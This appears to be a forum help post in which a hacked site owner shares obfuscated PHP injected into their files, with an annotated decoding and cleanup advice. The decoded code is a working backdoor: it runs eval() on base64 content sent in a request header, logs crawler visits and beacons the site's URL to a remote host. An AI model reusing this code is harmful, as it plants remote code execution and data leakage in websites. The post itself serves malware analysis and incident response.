My server was hacked and some encoded code was injected into it. I have not been able to work out what the purpose of this code is. Can anybody help?


My PHP files were hacked and someone injected some encoded text into them. Can anybody help me understand what this code is actually doing? I am not able to decode it.


    Starts like this:

    // Loader stage. One big base64 blob (a string table followed by code) lives in
    // $GLOBALS['II11']; 'PAYLOAD' stands in for it here. $II11 = 110426 is presumably the
    // blob's length (about 110 KB) — not verifiable from this excerpt.
    $II11 = 110426;
    if (!function_exists('I11lIl1I')) {
        $GLOBALS['II11'] =   'PAYLOAD';
    
        // Helper used by every decoded line below: base64_decode(substr($blob, $a, $b)).
        // pack('H*', '6261736536345f6465636f6465') is simply "base64_decode" spelled in hex,
        // so the real function name never appears in the file as plain text.
        function I11lIl1I($a, $b) {
            $c = $GLOBALS['II11'];
            $d = pack('H*', '6261736536345f6465636f' . '6465');
            return $d(substr($c, $a, $b));
        };
        // 16 base64 chars at offset 3374 decode to a 12-byte function name; with the "/e"
        // modifier on the next line this is almost certainly preg_replace. Under /e the
        // replacement argument — the 2862-char chunk at offset 507 — is evaluated as PHP, which
        // is how the decoded code shown below gets run. /e was removed in PHP 7.0, so this
        // loader only works on PHP 5.x.
        $QO0000QQ0 = I11lIl1I(3374, 16);
        $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
    };
    

Which decodes to this (every `I11lIl1I(offset, length)` call still reads a string out of the same blob, so the real strings are only recoverable with the full payload):

    // Decoded stage. The I11lIl1I(offset, length) calls return strings from the blob's table;
    // the literal values are not visible here. Where a comment names a likely string, that is
    // inferred from the decoded byte length and how the value is used — confirm against the
    // real payload. The guard constant ("determinator", 12 bytes, also defined further down)
    // makes this body run at most once per request.
    if (!defined("determinator")) {
        // A 7-byte function name (length fits ini_set) applied to a 15-byte and a 14-byte
        // option: one set to 1, one to 0. Exact options unknown; the shape matches the usual
        // "hide errors" setup.
        if (function_exists(I11lIl1I(1, 10))) {
            @ini_set(I11lIl1I(14, 20), 1);
            @ini_set(I11lIl1I(34, 19), 0);
        }
    
        // feof() wrapper that also stamps $I1lI1I with the current time on every call.
        // Because the stamp is refreshed each call, the "(microtime(true) - $I1lI1I) < 2"
        // test in w3net_getfile measures the time since the previous check, not since the
        // read loop began — so it is not an effective overall timeout.
        function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
            $I1lI1I = microtime(true);
            return feof($Q0OOOQ);
        }
    
        // Fetch "http://<$I1ll11><$I11IIl>&w=<method>" and return the response body.
        // Transport order: file_get_contents (w=fgc) if allow_url_fopen is on, else curl
        // (w=cu), else a raw socket to port 80 (w=sk). The w= marker tells the remote side
        // which transport succeeded. Returns NULL (falls off the end) if fsockopen fails.
        function w3net_getfile($I1ll11, $I11IIl) {
            $IIlI1I = "curl";
            // "curl_init" / "curl_setopt" / "curl_exec" are assembled from pieces, presumably
            // so the names do not appear whole in the file.
            $I1IIll = $IIlI1I . "_init";
            if (@ini_get("allow_url_fopen") == "1") {
                return @file_get_contents("http://" . $I1ll11 . $I11IIl . "&w=fgc");
            } elseif (function_exists($I1IIll)) {
                $QO00QO = @$I1IIll();
                $QOOOQQ = $IIlI1I . "_setopt";
                $IIl11I = $IIlI1I . "_exec";
                @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl . "&w=cu");
                @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
                @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
                @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
                $IIIl1I = @$IIl11I($QO00QO);
                @curl_close($QO00QO);
                if (empty($IIIl1I)) {
                    $IIIl1I = "";
                } return $IIIl1I;
            } else {
                // $Il111l / $Q000O0 are fsockopen's errno / errstr out-params; 5 s connect timeout.
                $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
                if ($Q0OOOQ) {
                    $I111lI = "";
                    $I1lI1I = NULL;
                    // Hand-rolled HTTP/1.0 GET. The User-Agent is "<PHP_OS>/<PHP_VERSION>", so
                    // every beacon discloses the server's platform and PHP version.
                    @fputs($Q0OOOQ, "GET {$I11IIl}" . "&w=sk HTTP/1.0" . "\r\n" . "Host: " . "{$I1ll11}\r\n");
                    $QOOOQO = PHP_OS . "/" . PHP_VERSION;
                    @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
                    while (!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
                        $I111lI .= @fgets($Q0OOOQ, 128);
                    } @fclose($Q0OOOQ);
                    // Drop everything before the first blank line (the response headers).
                    $Q000OQ = explode("\r\n\r\n", $I111lI);
                    unset($Q000OQ[0]);
                    return implode("\r\n\r\n", $Q000OQ);
                }
            }
        }
    
        // Writes one "Y_<key>:<value>" line to the response; used only in the backdoor branch.
        function w3net_output($I1I1lI, $I1lIll) {
            echo "Y_" . $I1I1lI . ":" . $I1lIll . "\r\n";
        }
    
        // $_SERVER accessor. Not called anywhere in the code shown.
        function php_server($Q0000Q) {
            return @$_SERVER[$Q0000Q];
        }
    
    // Per-request setup. Decoded lengths: $IlI11l ~10 bytes and $I1lll1 ~4 bytes (both sent
    // in the beacon query; $I1lll1 also feeds the md5 key), $Q0Q0QO ~17 bytes (md5 key only),
    // $I1ll11 ~7 bytes (prefix for the host; length fits "http://").
    $IlI11l = I11lIl1I(55, 14);
        $I1lll1 = I11lIl1I(69, 6);
        $Q0Q0QO = I11lIl1I(78, 23);
        $I1ll11 = I11lIl1I(102, 10);
        // 5-byte $_SERVER key compared to a 3-byte value, swapping in an 8-byte prefix:
        // consistent with $_SERVER["HTTPS"] != "off" -> "https://". Then a 9-byte key (fits
        // HTTP_HOST) is appended, so $I1ll11 becomes "<scheme><host>".
        if (isset($_SERVER[I11lIl1I(114, 7)])) {
            if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) {
                $I1ll11 = I11lIl1I(130, 11);
            }
        } $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);
        // Blank out any GET value containing either of two short substrings (~5 and ~6
        // bytes; not recoverable here). strpos() is used without "!== false", so a match at
        // position 0 is ignored.
        foreach ($_GET as $I1I1lI => $I1lIll) {
            if (strpos($I1lIll, I11lIl1I(157, 7))) {
                $_GET[$I1I1lI] = I11lIl1I(167, 0);
            } elseif (strpos($I1lIll, I11lIl1I(167, 8))) {
                $_GET[$I1I1lI] = I11lIl1I(167, 0);
            }
        } if (!isset($_SERVER[I11lIl1I(175, 15)])) {
            // Reconstruct an 11-byte $_SERVER entry from another 11-byte entry plus a 1-byte
            // separator and a 12-byte entry — consistent with REQUEST_URI = SCRIPT_NAME . "?" .
            // QUERY_STRING for SAPIs that do not populate it.
            $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
            if (isset($_SERVER[I11lIl1I(211, 16)])) {
                $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
            }
        }
    
        // Returns the first writable directory from a fixed candidate list (with a trailing
        // separator), falling back to the directory of this file. Candidates include /dev/shm
        // and the hidden X11 socket dirs /tmp/.font-unix and /tmp/.ICE-unix as well as the
        // WordPress uploads/cache dirs — where to look for dropped files during cleanup.
        function get_temp_directory() {
            $I11III = dirname(__FILE__) . DIRECTORY_SEPARATOR;
            $Q0Q00Q = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III . "tmp", $I11III . "wp-content/uploads", $I11III . "wp-content/cache",);
            foreach ($Q0Q00Q as $Q0QOOO) {
                if (!empty($Q0QOOO)) {
                    $Q0QOOO.=DIRECTORY_SEPARATOR;
                    if (@is_writable($Q0QOOO)) {
                        $I11III = $Q0QOOO;
                        break;
                    }
                }
            } return $I11III;
        }
    
    // Main logic. I11lIl1I(235, 16) decodes to 12 bytes — the length of "determinator"
    // checked on the guard line above.
    if (strlen($I1ll11) < 10) {
            define(I11lIl1I(235, 16), 0);
        } elseif ($Q0OO0O = $I1ll11 . @$_SERVER[I11lIl1I(175, 15)]) {
            // $Q0OO0O = full request URL. $QO0O0Q is a per-host key: md5(scheme+host . PHP_OS
            // . two blob strings). Anyone who knows the blob strings can compute it for a
            // given host. $w3n_code = <writable dir> . <1-byte prefix, likely "."> . <md5>;
            // the same path plus a 4-byte suffix (used again below) is a log file. $IlIlII is
            // assigned but never read in the code shown.
            $QO0O0Q = @md5($I1ll11 . PHP_OS . $I1lll1 . $Q0Q0QO);
            $w3n_code = get_temp_directory() . I11lIl1I(253, 2) . $QO0O0Q;
            define(I11lIl1I(235, 16), $w3n_code);
            $IlIlII = $w3n_code . I11lIl1I(257, 6);
            // BACKDOOR / remote code execution. If an 11-byte $_SERVER entry (a request
            // header, going by the other header lookups here) equals the md5 key, a 13-byte
            // function name (length fits base64_decode) is applied to a 12-byte $_SERVER entry
            // and the result is eval()'d. The attacker gets echo'd "Y_..." status lines back
            // and the request then exits, so the site's normal page is never rendered.
            if (@$_SERVER[I11lIl1I(267, 15)] == $QO0O0Q) {
                $QO0QQ0 = I11lIl1I(282, 18);
                echo "\r\n";
                w3net_output(I11lIl1I(301, 8), $I1lll1 . I11lIl1I(310, 2) . $IlI11l . I11lIl1I(314, 6));
                if ($Q00OQO = $QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])) {
                    @eval($Q00OQO);
                    echo "\r\n";
                    w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
                } exit(0);
            } $II11l1 = False;
            // Visitor classification. A 15-byte $_SERVER entry (length fits HTTP_USER_AGENT)
            // is lowercased and checked against a ~40-byte, 1-byte-delimited token list (not
            // recoverable here; this shape is typical of search-engine crawler names). On a
            // hit, "<time>\t<token>\t<urlencoded REQUEST_URI>" is appended to the log file
            // (1-byte fopen mode, presumably "a") and $II11l1 is set.
            $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
            foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
                if (strpos($Il11I1, $QOOQOO) !== False) {
                    $Il1Il1 = @fopen($w3n_code . I11lIl1I(257, 6), I11lIl1I(430, 2));
                    $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
                    @fwrite($Il1Il1, time() . "\t" . $QOOQOO . "\t" . $Ill11I . "\n");
                    @fclose($Il1Il1);
                    $II11l1 = True;
                    break;
                }
            } if (@is_file($w3n_code)) {
                // If the dropped file already exists, refresh its mtime and execute it as PHP.
                @touch($w3n_code);
                @include_once($w3n_code);
            } elseif ($II11l1 === True) {
                // First matching visit: create the file, then beacon to the first of two remote
                // hosts (~9 and ~12 bytes; only $I1Il1I[0] is used here) with the urlencoded
                // page URL, the md5 key and the two blob strings. Note that in the code shown
                // the response $QOQOQO is never written to $w3n_code — how the file gets its
                // content is not visible in this excerpt.
                $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
                if (@touch($w3n_code)) {
                    $Q0OO0O = @urlencode($Q0OO0O);
                    $I11IIl = I11lIl1I(465, 14) . $Q0OO0O . I11lIl1I(482, 4) . $QO0O0Q . I11lIl1I(487, 12) . $IlI11l . I11lIl1I(503, 4) . $I1lll1;
                    $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
                    @touch($w3n_code);
                }
            }
        } else {
            // Only reached if the URL string above is falsy, which the strlen check makes
            // practically impossible.
            define(I11lIl1I(235, 16), 1);
        }
    }
    

After that, who knows — the rest depends on what the remote host serves into the cache file. Treat the box as fully compromised: the `eval()` branch hands arbitrary code execution to anyone who can reproduce the md5 key, so restore from a known-clean backup rather than just removing the snippet, rotate every credential the server held, and look for the dropped files (a hidden md5-named file plus a log next to it) in the writable directories listed in `get_temp_directory()`. Happy hunting.
